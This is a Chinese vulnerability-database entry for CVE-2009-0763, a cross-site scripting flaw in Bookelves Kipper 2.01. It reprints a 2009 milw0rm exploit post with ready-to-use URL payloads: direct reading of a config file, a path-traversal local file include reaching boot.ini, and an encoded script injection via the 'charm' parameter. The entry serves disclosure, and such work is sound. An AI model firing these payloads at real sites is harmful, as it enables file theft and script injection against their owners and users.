Bookelves Kipper 'default.php'跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117356 漏洞类型 跨站脚本
发布时间 2009-02-05 更新时间 2009-03-06
CVE编号 CVE-2009-0763 CNNVD-ID CNNVD-200903-152
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/7993
https://www.securityfocus.com/bid/80640
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-152
|漏洞详情
Kipper是一款独特的内容管理系统,可以允许直接从内容文件创建静态网站页面,而无需数据库。Kipper2.01版本的default.php中存在跨站脚本攻击漏洞。远程攻击者可以借助charm参数,注入任意web脚本或HTML。
|漏洞EXP
# Kipper 2.01 Multiple Vulnes ( Remote Data Reading , Local File Include , Remote XSS )

# Download From : http://www.bookelves.com/kipper/files/kipper20.zip

- Found By : RoMaNcYxHaCkEr
- My Site : WwW.Sec-Code.CoM
- My Group : Security - Codes Group

# Exploit [1]:

- Remote Data Reading :

http://localhost/kipper20/job/config.data

# Exploit [2]:

- Local File Include :

http://localhost/kipper20/index.php?configfile=../../../../boot.ini

# Exploit [3]:

- Remote XSS :

http://localhost/kipper20/default.php?charm=%3E%20%3E%20ScRiPt%20%3EALERT%20529227151633%20%3B%20%2FScRiPt%3E#685828818694793444

# EOF ..

# rXh

# bEST wISHES

# milw0rm.com [2009-02-05]
|受影响的产品
Bookelves Kipper 2.01
|参考资料

来源:BID
名称:33640
链接:http://www.securityfocus.com/bid/33640
来源:MILW0RM
名称:7993
链接:http://www.milw0rm.com/exploits/7993
来源:SECUNIA
名称:33832
链接:http://secunia.com/advisories/33832